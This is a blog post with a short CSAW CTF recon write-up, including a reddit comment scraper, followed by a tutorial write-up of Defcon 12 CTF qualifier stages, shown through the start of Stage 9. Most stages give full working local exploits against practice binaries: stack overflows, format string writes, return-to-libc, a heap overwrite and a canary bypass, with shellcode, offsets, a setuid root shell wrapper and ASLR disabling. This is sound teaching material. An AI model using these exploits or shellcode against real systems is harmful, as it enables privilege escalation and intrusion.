Dan Guido’s Favorite Food? (A script to search reddit comments)

CSAW CTF was fun. My team (ACMEPharm) solved all the challenges but network 400, which was a dumb challenge anyway :P

One of the other challenges we struggled with was a recon one: “what is Dan Guido’s favorite food?” There was also a hint that said something like “a lot of our users use reddit”. Since we had already solved all the other recon challenges and none required reddit, we were fairly certain this was where to look. Looking at dguido’s page, there are tons of links; he’s part of the 5 year club.

Reddit has a robots.txt that tells search engines not to crawl it, and a user’s comments aren’t indexed anyway, so they aren’t searchable with reddit’s own search. This was the motivation for me to scrape a user’s comments so I could search through them locally.

#!/usr/bin/python

import urllib
import sys
import time

class AppURLopener(urllib.FancyURLopener):
    version = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1"

urllib._urlopener = AppURLopener()

class redditScrape:
    def __init__(self, startpage):
        self.thispage = startpage
        self.counter = 1

    def getInfo(self):
        while 1:
            print "Fetching ", self.thispage
            f = urllib.urlopen(self.thispage)
            data = f.read()
            self.saveHtml(data)
            self.getNextPage(data)
            #reddit asks for only one request every two seconds
            time.sleep(2)

    def saveHtml(self, data):
        f = open(str(self.counter), "w")
        f.write(self.thispage + "\n\n")
        f.write(data)
        f.close()

    def getNextPage(self, data):
        index = data.find("rel=\"nofollow next\"")
        if index == -1:
            print "Search done"
            sys.exit(0)
        else:
            hrefstart = data.rfind("href", 0, index) + 6
            hrefend = data.find("\"", hrefstart)
            self.thispage = data[hrefstart: hrefend]
            self.counter += 1

a = redditScrape("http://www.reddit.com/user/dguido")
a.getInfo()

Then I would

grep -Ri "cheese" .
grep -Ri "pizza" .
...

Unfortunately the answer turned out to be in another person’s comment so my script missed it, but someone else on my team found it not long after… in a thread I was blabbering in.

Defcon 2004 CTF Quals Writeup

Aaaaaah, yeah. Qualifying for Defcon 12, suckers!

This post is a tutorial-style writeup of all the Defcon 12 CTF qualifiers I could manage to solve. It should be a decent place to start if you haven’t done a lot of CTF style challenges/binary exploitation before, since the binaries all easily run on Linux and there are solutions available. I originally grabbed the binaries here, and I’ve also mirrored them here. Thanks captf.com, Defcon, and (I think) Ghetto Hackers!

I thought these challenges were fun, and there were a couple things I came across that I haven’t seen before. If this were skiing, this would be a blue square, which stands for intermediate. It might be a bit boring for the pros, but I’m not going to re-hash your first buffer overflow or talk about all the details of a format string either (and there should be enough information to hopefully follow along if you get stuck at any point).

If you try these and you do get stuck, feel free to ask questions and I’ll do my best to answer them.

Setup

The challenges are just a bunch of ELF files that are run locally. I assume that in the real qualifiers each stage was probably setuid to the next level, similar to how other popular challenges like smashthestack work. My goal for each level was simply to get a shell. I reused the same /bin/dash shellcode again and again. I made no effort to make things reliable, and in some cases it would be pretty difficult to make these exploits reliable.

I used a Backtrack 5 R2 32-bit VM. 32-bit may be important, since by default the 32-bit (non-PAE) kernel doesn’t enable NX, so depending on the binary it might be easier to execute code on the stack.

root@bt:~# dmesg |grep -i nx
[    0.000000] Notice: NX (Execute Disable) protection cannot be enabled: non-PAE kernel!

Also, I disabled ASLR.

root@bt:~# echo 0 > /proc/sys/kernel/randomize_va_space 

As for tools, I pretty much only used python, IDA Pro and gdb. Alright, let’s get cracking!

Stage 2

This one was a very straightforward stack overflow. The first thing I did was just run it with a long argv[1]. It crashed. So I set ulimit -c unlimited and used Metasploit’s pattern_create/pattern_offset to examine the core dump.

./stage2 `pattern_create.rb 1024`

This created a segfault

gdb ./stage2 core
info registers
...

shell ./pattern_offset.rb 35644134
104

So offset 104 for an eip overwrite, and the shellcode can probably go after 104, since that doesn’t seem to have been modified.
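If you don’t have the Metasploit scripts handy, the pattern logic is small enough to sketch in Python. This is a rough stand-in for pattern_create.rb/pattern_offset.rb (not the real Ruby tools, but it reproduces the same offsets):

```python
import string
import struct

def pattern_create(length):
    # cycle through Upper-lower-digit triplets, like pattern_create.rb
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]

def pattern_offset(eip_value, length=1024):
    # eip holds four pattern bytes read little-endian, so repack them
    # before searching the pattern
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return pattern_create(length).find(needle)

print(pattern_offset(0x35644134))  # the eip value from the core dump: 104
```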

#!/usr/bin/python

import os
import struct

class exploit:
  def __init__(self):
    self.vulnpath = "./stage2"

    #spawns /bin/dash, real server may require different stuff (connectback, etc)
    dashsc = (
"\xd9\xec\xbd\xb6\xac\xb7\x84\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x0c\x31\x6e\x18\x03\x6e\x18\x83\xc6\xb2\x4e\x42\xee" +
"\xb1\xd6\x34\xbd\xa3\x8e\x6b\x21\xa2\xa8\x1c\x8a\xc7\x5e" +
"\xdd\xbc\x08\xfd\xb4\x52\xdf\xe2\x15\x43\xd5\xe4\x99\x93" +
"\xc6\x86\xf0\xfd\x37\x23\x62\x71\x2f\xab\x33\x26\x26\x4a" +
"\x76\x48"
    )

    retaddr = struct.pack("<I", 0xbffffcf0) * 5
    padlen = 100

    self.payload = ("A" * 100 + retaddr + "\x90" * 300) + dashsc
    self.env = {"shell" : "/bin/dash", "format" : "%3$n", "sc" : dashsc}

  def pwn(self):
    os.execve( self.vulnpath, [self.vulnpath, self.payload], self.env)

m = exploit()
m.pwn()

Stage 3

This looks like a straightforward format string

.text:08048364 push    ebp
.text:08048365 mov     ebp, esp
.text:08048367 sub     esp, 8
.text:0804836A mov     eax, [ebp+format]
.text:0804836D mov     [esp], eax      ; format
.text:08048370 call    _printf
.text:08048375 leave
.text:08048376 retn
.text:08048376 sub_8048364

And sure enough running with %n crashes the process. Looking for a location to overwrite:

# objdump -s -j .dtors stage3

stage3:     file format elf32-i386

Contents of section .dtors:
 8049594 ffffffff 00000000                    ........

So overwriteloc = 0x8049598 (the null entry right after the 0xffffffff marker).

#!/usr/bin/python

import struct
import os

class exploit:
	def __init__(self):
		self.vulnpath = "/root/Desktop/stage3"

		#spawns /bin/dash
		dashsc = (
"\xd9\xec\xbd\xb6\xac\xb7\x84\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x0c\x31\x6e\x18\x03\x6e\x18\x83\xc6\xb2\x4e\x42\xee" +
"\xb1\xd6\x34\xbd\xa3\x8e\x6b\x21\xa2\xa8\x1c\x8a\xc7\x5e" +
"\xdd\xbc\x08\xfd\xb4\x52\xdf\xe2\x15\x43\xd5\xe4\x99\x93" +
"\xc6\x86\xf0\xfd\x37\x23\x62\x71\x2f\xab\x33\x26\x26\x4a" +
"\x76\x48"
		)

		owlocation = 0x08049598
		#owValue = 0x41414242
		owValue = 0xbfffff3c

		#nice to make sure self.payload is always a consistent length
		#padlen and offset are tied together
		padlen = 562
		offset = 110

		#fmtstr = "AAAABBBBCCCCDDD %113$08x"
		fmtstr = self.address_overwrite_format(owlocation, owValue)
		self.payload = (self.padstr(fmtstr))
		self.env = {"shell" : "/bin/dash", "format" : "%3$n", "sc" : "\x90" *112 +  dashsc}

	def padstr(self, payload, padlen=650):
		if (len(payload) > padlen):
			raise "payload too long"
		return payload + (" " * (padlen-len(payload)))

	def address_overwrite_format(self, owlocation, owvalue):
		HOW = owvalue >> 16
		LOW = owvalue & 0xffff
		mformat = ""
		if LOW > HOW:
			mformat = struct.pack("<I", owlocation +2) + struct.pack("<I", owlocation) + "%." + str(HOW-8) +"x%113$hn%." + str(LOW-HOW) + "x%114$hn"
		else:
			print "here"
			mformat = struct.pack("<I", owlocation +2) + struct.pack("<I", owlocation) + "%." + str(LOW-8) +"x%114$hn%." + str(HOW-LOW) + "x%113$hn"
		return mformat

	def pwn(self):
		os.execve( self.vulnpath, [self.vulnpath, self.payload], self.env)

m = exploit()
m.pwn()

Stage 4

This one needs both a HELLOWORLD environment variable and an argument.

HELLOWORLD overwrites the local counter variable, which is used as an offset.

The loop at 08048472 is copying from src+var_counter to buffer+varcounter, one byte at a time. When we overflow, we overwrite the counter (at byte offset 125) so using this we can overwrite the return address on the stack (at offset 140).

Here’s the loop:

.text:08048472 loc_8048472:                            ; CODE XREF: func_infinite+4Ej
.text:08048472                 mov     eax, [ebp+var_counter]
.text:08048475                 add     eax, [ebp+src]
.text:08048478                 cmp     byte ptr [eax], 0
.text:0804847B                 jnz     short loc_804847F
.text:0804847D                 jmp     short locret_804849C
.text:0804847F ; ---------------------------------------------------------------------------
.text:0804847F
.text:0804847F loc_804847F:                            ; CODE XREF: func_infinite+2Fj
.text:0804847F                 lea     eax, [ebp+buffer] ; copy from src+counter to buffer+counter
.text:08048485                 mov     edx, eax
.text:08048487                 add     edx, [ebp+var_counter]
.text:0804848A                 mov     eax, [ebp+var_counter]
.text:0804848D                 add     eax, [ebp+src]
.text:08048490                 movzx   eax, byte ptr [eax]
.text:08048493                 mov     [edx], al
.text:08048495                 lea     eax, [ebp+var_counter]
.text:08048498                 inc     dword ptr [eax]
.text:0804849A                 jmp     short loc_8048472
.text:0804849C ; ---------------------------------------------------------------------------
.text:0804849C
.text:0804849C locret_804849C:                         ; CODE XREF: func_infinite+31j
.text:0804849C                 leave
.text:0804849D                 retn

The stack looks like this:

-00000088 buffer          db 124 dup(?)
-0000000C var_counter     dd ?
-00000008                 db ? ; undefined
-00000007                 db ? ; undefined
-00000006                 db ? ; undefined
-00000005                 db ? ; undefined
-00000004                 db ? ; undefined
-00000003                 db ? ; undefined
-00000002                 db ? ; undefined
-00000001                 db ? ; undefined
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)
+00000008 src             dd ?

So the final exploit was:

#!/usr/bin/python

import os
import argparse
import struct

class exploit:
  def __init__(self):
    self.vulnpath = "./stage4"

    #spawns /bin/dash
    dashsc = (
"\xd9\xec\xbd\xb6\xac\xb7\x84\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x0c\x31\x6e\x18\x03\x6e\x18\x83\xc6\xb2\x4e\x42\xee" +
"\xb1\xd6\x34\xbd\xa3\x8e\x6b\x21\xa2\xa8\x1c\x8a\xc7\x5e" +
"\xdd\xbc\x08\xfd\xb4\x52\xdf\xe2\x15\x43\xd5\xe4\x99\x93" +
"\xc6\x86\xf0\xfd\x37\x23\x62\x71\x2f\xab\x33\x26\x26\x4a" +
"\x76\x48"
    )

    overwriteaddr = struct.pack("<I", 0xbffffe60)

    arg1 = "A" * 140
    #eip offset is at 140 (0x8b)
    #we overwrite the counter byte at 125
    envin = "B" * 124 + "\x8b" + "B" * 15 + overwriteaddr

    self.payload = arg1
    self.env = {"shell" : "/bin/dash", "format" : "%3$n", "sc" : "\x90" * 200 + dashsc, "HELLOWORLD" : envin}
    self.mfile = "command.gdb"

  def rungdb(self):
    #write to command.gdb
    mf = open(self.mfile, "w")
    #edit me
    commands = [
      "file " + self.vulnpath,
      "set $src=8",
      "set $counter=-0xc",
      "set $buffer=-0x88",
      "break *0x08048472 if *(int)($ebp-0xc) == 124",
      "run " + '"' + self.payload + '"',
      "info registers",
      "disable 1",
      "break *0x08048472",
      "x/d $ebp + $counter"
    ]
    mf.writelines([i + "\n" for i in commands])
    mf.close()

    gdbargs = ["/usr/bin/gdb", "-x", self.mfile]
    os.execve("/usr/bin/gdb", gdbargs, self.env)

  def pwn(self):
    os.execve( self.vulnpath, [self.vulnpath, self.payload], self.env)

parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
args = parser.parse_args()
m = exploit()
if args.debug:
    m.rungdb()
else:
    m.pwn()

Stage 5

I’m not sure why this level exists… it’s the easiest yet… a vanilla strcpy. Literally a 5 minute level. To make the tutorial more interesting, I tried to exploit it without executing code on the stack, using return-to-libc.

First, I created a simple setuid program named wrapper:

int main() {
	setuid(0);
	setgid(0);
	system("/bin/sh");
}

Now the goal is to craft the stack so that I call execl like this:

execl("./wrapper", "./wrapper", NULL);

Because arguments are pushed in reverse, I need to put NULL in my string before “./wrapper”. One way to solve this is by putting a printf before the execl that has a format string, so you can write a NULL to the correct location on the stack before execl is called (e.g. printf(“%3$n”, xxxx, xxxx, xxxx, myaddress)). In the end I need several addresses: the address of libc’s printf, libc’s execl, a pointer to the string “%3$n”, a pointer to the string “./wrapper”, and the stack address “myaddress”. I found these addresses by intentionally crashing the program with an invalid printf address and other placeholders, then opening the core file with gdb and searching for them. Useful gdb commands are “p printf” and “find $esp, 0xbfffffff, “./wrapper””.

The final exploit (which never executes on the stack and will vary based on your computer) looks like this:

#!/usr/bin/python

import os
import argparse
import struct

class exploit:
  def __init__(self):
    self.vulnpath = "./stage5"
 
    printf = struct.pack("<I", 0xb7ebb130)
    execl = struct.pack("<I", 0xb7f0c330)
    formatstr = struct.pack("<I", 0xbfffffee) #points to %3$n
    progname = struct.pack("<I", 0xbfffffcd) #points to "./wrapper"
    nullwrite = struct.pack("<I", 0xbffffd30) #points to itself

    arg1 = "A" * 260 + printf + execl + formatstr + progname + progname + nullwrite
    

    self.payload = arg1
    self.env = {"shell" : "/bin/dash", "format" : "%3$n", "blah" : "./wrapper"}
    self.mfile = "command.gdb"

  def pwn(self):
    os.execve( self.vulnpath, [self.vulnpath, self.payload], self.env)

m = exploit()
m.pwn()

Stage 6

This is a heap overflow resulting in an arbitrary overwrite with the linking/unlinking. The while loop at the end is to prevent us from simply overwriting dtors.

I think the best approach is:

• We can control src and dest for the last strcpy at 0804841F
• Use it to overwrite strcpy’s own return address saved on the stack

One note: I used core dumps again rather than running under gdb directly, so gdb didn’t perturb any of the stack values, since they’re sensitive. Calculating how big stuff should be, arg1 starts overwriting the destination at offset 268.

Here I try that with owDest set to 0x56565656 and a dummy source string:

(gdb) info registers
eax            0x56565656	1448498774
ecx            0x42	66
edx            0x0	0
ebx            0xb7fcaff4	-1208176652
esp            0xbffffae0	0xbffffae0
ebp            0xbffffae8	0xbffffae8
esi            0x56565655	1448498773
edi            0xbffffebe	-1073742146
eip            0xb7ee8214	0xb7ee8214 <strcpy+20>
eflags         0x210246	[ PF ZF IF RF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) x/i $eip
=> 0xb7ee8214 <strcpy+20>:	mov    %cl,0x1(%esi,%edx,1)

Looking around for valid addresses…

(gdb) x/i $eip
=> 0xb7ee8214 <strcpy+20>:	mov    %cl,0x1(%esi,%edx,1)
(gdb) backtrace
#0  0xb7ee8214 in strcpy () from /lib/tls/i686/cmov/libc.so.6
#1  0x08048424 in ?? ()
#2  0xb7e8bbd6 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
#3  0x08048321 in ?? ()
(gdb) x/20x $esp
0xbffffae0:	0x00000000	0x00000000	0xbffffc18	0x08048424
0xbffffaf0:	0x56565656	0xbffffebe	0xb7e78ba8	0x00000001
0xbffffb00:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffb10:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffb20:	0x41414141	0x41414141	0x41414141	0x41414141

So we want to overwrite $esp + 12 (dest=0xbffffaec) with an address for our shellcode, 0xbfffff30. And bam, this works:

#!/usr/bin/python

import os
import argparse
import struct

class exploit:
  def __init__(self):
    self.vulnpath = "./stage6"

    #spawns /bin/dash
    dashsc = (
"\xd9\xec\xbd\xb6\xac\xb7\x84\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x0c\x31\x6e\x18\x03\x6e\x18\x83\xc6\xb2\x4e\x42\xee" +
"\xb1\xd6\x34\xbd\xa3\x8e\x6b\x21\xa2\xa8\x1c\x8a\xc7\x5e" +
"\xdd\xbc\x08\xfd\xb4\x52\xdf\xe2\x15\x43\xd5\xe4\x99\x93" +
"\xc6\x86\xf0\xfd\x37\x23\x62\x71\x2f\xab\x33\x26\x26\x4a" +
"\x76\x48"
    )
    owDest = struct.pack("<I", 0xbffffaec)
    scAddr = struct.pack("<I", 0xbfffff30)

    arg1 = "A" * 268 + owDest
    arg2 = scAddr

    self.arg1 = arg1
    self.arg2 = arg2
    self.env = {"shell" : "/bin/dash", "format" : "%3$n", "sc" : "\x90" * 200 + dashsc}
    self.mfile = "command.gdb"

  def rungdb(self):
    #write to command.gdb
    mf = open(self.mfile, "w")
    #edit me
    commands = [
      "file " + self.vulnpath,
      "set $arg1=0xc + 4",
      "set $arg2=0xc + 8",
      #"break *0x0804841F",
      "run " + '"' + self.arg1 + '" "' + self.arg2 + '"',
      "x/i $eip",
      "info registers"
    ]
    mf.writelines([i + "\n" for i in commands])
    mf.close()

    gdbargs = ["/usr/bin/gdb", "-x", self.mfile]
    os.execve("/usr/bin/gdb", gdbargs, self.env)

  def pwn(self):
    os.execve( self.vulnpath, [self.vulnpath, self.arg1, self.arg2], self.env)

parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
args = parser.parse_args()
m = exploit()
if args.debug:
    m.rungdb()
else:
    m.pwn()

Stage 7

This problem has a simple strcpy overflow, but we can’t just overwrite the ret value because of this “canary” loop that makes sure our string terminates.

.text:08048436
.text:08048436 loc_8048436:
.text:08048436 cmp     [ebp+var_a], 0
.text:0804843B jnz     short loc_8

Since var_a (a local variable) must stay 0, and a 0 byte would terminate our strcpy string, we can’t overflow past it directly. But there’s also a format string bug that lets us overwrite a single word.

Strategy:

• Simple regular overflow with the strcpy (it can’t be a whole address – only a word and this is in range)
• Printf overwrite the value for var_a

Important Offsets:
• 264 to var_malloced, which holds the location we can overwrite with our format string
• 270 to var_a, which we’re trying to overwrite with 0, but we can’t do that directly because a 0 byte would end our string
• 284 to ret

The format string write boils down to mov %dx,(%eax), where %dx is n (the number of characters printed). Making that count exactly 2**16 wraps the value, so we can get a 0 into dx and bypass the “canary”, since the check only compares two bytes with cmpw.

0x08048436 in ?? ()
=> 0x8048436:	cmpw   $0x0,-0xa(%ebp)
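The wraparound trick is plain 16-bit arithmetic: the %hn-style write (and the cmpw check) only see the low two bytes of the count, so if the total printed length is exactly 2**16 the stored halfword is 0. A quick sketch (the 8240 is an arbitrary placeholder for the payload built so far):

```python
# %hn stores only the low 16 bits of the character count
count = 2 ** 16
assert count & 0xFFFF == 0  # a count of exactly 65536 writes the halfword 0

# so pad the payload until its printed length wraps to zero
payload = "A" * 8240  # placeholder: the payload built so far
payload += "D" * (2 ** 16 - len(payload))
assert len(payload) & 0xFFFF == 0
```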

To get the address where the canary (var_a) exists, I let it run in that continuous loop and attached a debugger after running.

(gdb) attach 21379
Attaching to process 21379
Reading symbols from /root/Desktop/defcon/7/stage7...(no debugging symbols found)...done.
Reading symbols from /lib/tls/i686/cmov/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0x08048436 in ?? ()
(gdb) x/i $eip
=> 0x8048436:	cmpw   $0x0,-0xa(%ebp)
(gdb) x/x $ebp -0xa    #this is the value we need to overwrite
0xbffefd1e:	0x43434343
(gdb) x/x 0xbffefb8e      #this is the value I guessed to be overwritten, so off a bit
0xbffefb8e:	0xf0000000

Here’s the final code:

#!/usr/bin/python

import os
import argparse
import struct

class exploit:
  def __init__(self):
    self.vulnpath = "./stage7"

    #spawns /bin/dash
    dashsc = (
"\xd9\xec\xbd\xb6\xac\xb7\x84\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x0c\x31\x6e\x18\x03\x6e\x18\x83\xc6\xb2\x4e\x42\xee" +
"\xb1\xd6\x34\xbd\xa3\x8e\x6b\x21\xa2\xa8\x1c\x8a\xc7\x5e" +
"\xdd\xbc\x08\xfd\xb4\x52\xdf\xe2\x15\x43\xd5\xe4\x99\x93" +
"\xc6\x86\xf0\xfd\x37\x23\x62\x71\x2f\xab\x33\x26\x26\x4a" +
"\x76\x48"
    )

    #overwrite var_a with 0 to bypass the "canary"
    var_malloced = struct.pack("<I", 0xbffefd1e)
    var_a = struct.pack("<I", 0x43434343)

    ret_ow = struct.pack("<I", 0xbfffff10)

    arg1 = "A" * 264 + var_malloced + "AA" + var_a + "Q"* 10 + ret_ow

    #pad arg1 so it's 2**16 to have our overwrite value be exactly 0
    arg1 += "D" * (2**16 - len(arg1))

    self.arg1 = arg1
    self.env = {"shell" : "/bin/dash", "format" : "%3$n", "sc" : "\x90" * 200 + dashsc}
    self.mfile = "command.gdb"

  def rungdb(self):
    #write to command.gdb
    mf = open(self.mfile, "w")
    #edit me
    commands = [
      "file " + self.vulnpath,
      "set $var_a=-0xA",
      "set $arg2=0xc + 8",
      "run " + '"' + self.arg1 + '"',
      "x/i $eip",
      "info registers"
    ]
    mf.writelines([i + "\n" for i in commands])
    mf.close()

    gdbargs = ["/usr/bin/gdb", "-x", self.mfile]
    os.execve("/usr/bin/gdb", gdbargs, self.env)

  def pwn(self):
    os.execve( self.vulnpath, [self.vulnpath, self.arg1], self.env)

parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
args = parser.parse_args()
m = exploit()
if args.debug:
    m.rungdb()
else:
    m.pwn()

Stage 8

This program crashes very easily, but the exploit took a few steps. Here’s the overall strategy.

  1. Overwrite the address 0x41414141 with the value 9000, which will segfault. Note ebp in the crash dump (in the program below, owDest references the %hn target and owValue is the length being written there).
    Program terminated with signal 11, Segmentation fault.
    #0  0xb7eb4ec1 in vfprintf () from /lib/tls/i686/cmov/libc.so.6
    (gdb) info registers 
    eax            0x41414141	1094795585
    ecx            0xbfff6d3c	-1073779396
    edx            0x9000	36864
    ebx            0xb7fc9ff4	-1208180748
    esp            0xbfff665c	0xbfff665c
    ebp            0xbfff6be8	0xbfff6be8
    esi            0xbfff6c10	-1073779696
    edi            0xbfff6d38	-1073779400
    eip            0xb7eb4ec1	0xb7eb4ec1 <vfprintf+17073>
    eflags         0x10286	[ PF SF IF RF ]
    cs             0x73	115
    ss             0x7b	123
    ds             0x7b	123
    es             0x7b	123
    fs             0x0	0
    gs             0x33	51
    (gdb) x/i $eip
    => 0xb7eb4ec1 <vfprintf+17073>:	mov    %dx,(%eax)
    
    
  2. Overwrite ebp with xxxx9000, which is an address we control. This took some trial and error to see how long it should be, but 9000 seems reasonable

    (gdb) x/x 0xbfff9000
    0xbfff9000:	0x41414141
    
  3. Having accomplished the first two steps, we still segfault at the end of vsnprintf at movb $0x0,(%edx). We control edx, so we find this offset and overwrite something harmless. Using msf_pattern, this offset is at location 8012. Below is the crash.

    (gdb) info registers 
    eax            0x9000	36864
    ecx            0xbfff6bf4	-1073779724
    edx            0x41414141	1094795585
    ebx            0xb7fc9ff4	-1208180748
    esp            0xbfff6bf4	0xbfff6bf4
    ebp            0xbfff9000	0xbfff9000
    esi            0xbfff6cb0	-1073779536
    edi            0xbfff6d38	-1073779400
    eip            0xb7ed446e	0xb7ed446e <vsnprintf+206>
    eflags         0x10a87	[ CF PF SF IF OF RF ]
    cs             0x73	115
    ss             0x7b	123
    ds             0x7b	123
    es             0x7b	123
    fs             0x0	0
    gs             0x33	51
    (gdb) x/i $eip
    => 0xb7ed446e <vsnprintf+206>:	movb   $0x0,(%edx)
    
    
  4. Ebp now points to our controlled value, so we need to find the offset to the xxxx9000 that we’re pointing at, and point it at our shellcode (remember, it’s a pointer to our shellcode, not the shellcode itself). Its offset is at 8012 + 216, and searching through the program for our shellcode we can just point it there.

Now that we have all these offsets, we can build an exploit.

#!/usr/bin/python

import os
import argparse
import struct
from subprocess import *

class exploit:
  def __init__(self):
    self.vulnpath = "./stage8"
 
    #spawns /bin/dash
    dashsc = (
"\xd9\xec\xbd\xb6\xac\xb7\x84\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x0c\x31\x6e\x18\x03\x6e\x18\x83\xc6\xb2\x4e\x42\xee" +
"\xb1\xd6\x34\xbd\xa3\x8e\x6b\x21\xa2\xa8\x1c\x8a\xc7\x5e" +
"\xdd\xbc\x08\xfd\xb4\x52\xdf\xe2\x15\x43\xd5\xe4\x99\x93" +
"\xc6\x86\xf0\xfd\x37\x23\x62\x71\x2f\xab\x33\x26\x26\x4a" +
"\x76\x48"
    )


    #at the segfault, this is the return stack
    #overwrite $ebp
    owDest = struct.pack("<I", 0xbfff6be8)
    owValue = 0x9000

    #useful msf patterns to find offsets
    #patternprog = "/usr/bin/ruby /opt/framework3/msf3/tools/pattern_create.rb " + str(owValue)
    #msfhandle = Popen(patternprog, shell=True, stdout=PIPE)
    #msf_pattern = msfhandle.communicate()[0].strip()

    garbageow = struct.pack("<I", 0xbfffffc4)
    ebpPointer = struct.pack("<I", 0x45454545)
    ebpPointer = struct.pack("<I", 0x41414141)
    eipPointer = struct.pack("<I", 0xbfff7c90)

    dashsc += "\x90" * 5000 + dashsc
    self.payload = owDest + dashsc + ("A" * (8012-len(dashsc)))
    self.payload += garbageow + "C" * 212 + ebpPointer + eipPointer
    self.payload += "G" * (owValue - len(self.payload)-2)

    self.env = {"shell" : "/bin/dash", "format" : "%3$n"}
    self.mfile = "command.gdb"

  #addresses were finicky - I opted to use dump files for this one
  def rungdb(self):
    #write to command.gdb
    mf = open(self.mfile, "w")
    #edit me
    commands = [
      "file " + self.vulnpath,
      "break *0x08048453",
      "run " + '"' + self.payload + '"',
      ]
    mf.writelines([i + "\n" for i in commands])
    mf.close()

    gdbargs = ["/usr/bin/gdb", "-x", self.mfile]
    os.execve("/usr/bin/gdb", gdbargs, self.env)

  def pwn(self):
    os.execve( self.vulnpath, [self.vulnpath, self.payload], self.env)


parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
args = parser.parse_args()
m = exploit()
if args.debug:
    m.rungdb()
else:
    m.pwn()

Stage 9

One of the first things I noticed here was a ctype call, so this was useful: http://refspecs.linuxbase.org/LSB_3.0.0/LSB-Core-generic/LSB-Core-generic/baselib—ctype-b-loc.html

The check at 0x080484B9 needs a 0x80 at an even offset to succeed, and we can only control up to the table plus 0xff. Looking at these values:

(gdb) x/510hx $eax+1
0xb7f92721:	0x0800	0x00d8	0x0800	0x00d8	0x0800	0x00d8	0x0800	0x00d8
0xb7f92731:	0x0800	0x00d8	0x0800	0x00d8	0x0800	0x00d8	0x0800	0x00d8
0xb7f92741:	0x0800	0x00d8	0x0800	0x00d8	0x0400	0x00c0	0x0400	0x00c0
0xb7f92751:	0x0400	0x00c0	0x0400	0x00c0	0x0400	0x00c0	0x0400	0x00c0
0xb7f92761:	0x0400	0x00c0	0x0800	0x00d5	0x0800	0x00d5	0x0800	0x00d5
0xb7f92771:	0x0800	0x00d5	0x0800	0x00d5	0x0800	0x00d5	0x0800	0x00c5
0xb7f92781:	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5
0xb7f92791:	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5
0xb7f927a1:	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5
0xb7f927b1:	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5
0xb7f927c1:	0x0800	0x00c5	0x0800	0x00c5	0x0800	0x00c5	0x0400	0x00c0
0xb7f927d1:	0x0400	0x00c0	0x0400	0x00c0	0x0400	0x00c0	0x0400	0x00c0
0xb7f927e1:	0x0400	0x00c0	0x0800	0x00d6	0x0800	0x00d6	0x0800	0x00d6
0xb7f927f1:	0x0800	0x00d6	0x0800	0x00d6	0x0800	0x00d6	0x0800	0x00c6
0xb7f92801:	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6
0xb7f92811:	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6
0xb7f92821:	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6
0xb7f92831:	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6
0xb7f92841:	0x0800	0x00c6	0x0800	0x00c6	0x0800	0x00c6	0x0400	0x00c0
0xb7f92851:	0x0400	0x00c0	0x0400	0x00c0	0x0400	0x00c0

Also, looking ahead in the code, var_58 (which is derived from a wonky calculation on the lookup table) is first checked to see if it’s bigger than 0x4f, and if it is, it’s just set to 0x4f. This is the size of our buffer.

08048523 jle     short loc_804852C
08048525 mov     [ebp+var_58], 4Fh
...

This value is then put in a loop until it’s equal to -1, and var_58 is treated like a counter, being decremented every time. Meanwhile, our arg is copied into that buffer of size 0x4f.

.text:08048530
.text:08048530 loc_8048530:                            ; CODE XREF: main+55j
.text:08048530                 dec     [ebp+var_58]
.text:08048533                 cmp     [ebp+var_58], 0FFFFFFFFh
.text:08048537                 jnz     short loc_8048540
.text:08048539                 jmp     short loc_8048553
.text:08048539 ; ---------------------------------------------------------------------------
.text:0804853B                 align 10h
.text:08048540
.text:08048540 loc_8048540:                            ; CODE XREF: main+3Bj
.text:08048540                 call    _getchar
.text:08048545                 mov     eax, eax
.text:08048547                 mov     ecx, [ebp+var_bufferptr]
.text:0804854A                 mov     edx, ecx
.text:0804854C                 mov     [edx], al
.text:0804854E                 inc     [ebp+var_bufferptr]
.text:08048551                 jmp     short loc_8048530
.text:08048553 ; ---------------------------------------------------------------------------

This has an integer error, since it checks whether our signed int is -1 and then decrements it. The more negative our number, the fewer iterations we go through, and while we don’t need to be exact, there’s a > 2GB difference between -2 and -INT_MAX. Let’s see the most negative number we can get from the weird calculation. As input there are quite a few numbers containing \x80 that we could play with. However, I tried to just “brute force” this and use the second one at offset \x30 (if you use the first one, it subtracts the value and it’s a nop). So I gave it a bunch of \x30s (thousands) and set a conditional breakpoint to check what the value is.

"break *0x080484E3 if $edx  < -2000000000",

I also had a breakpoint set so it would print the original arg address

      "break *0x08048530",
      "print \"EBP plus arg0 is: \"",
      "print $ebp + 8" ,

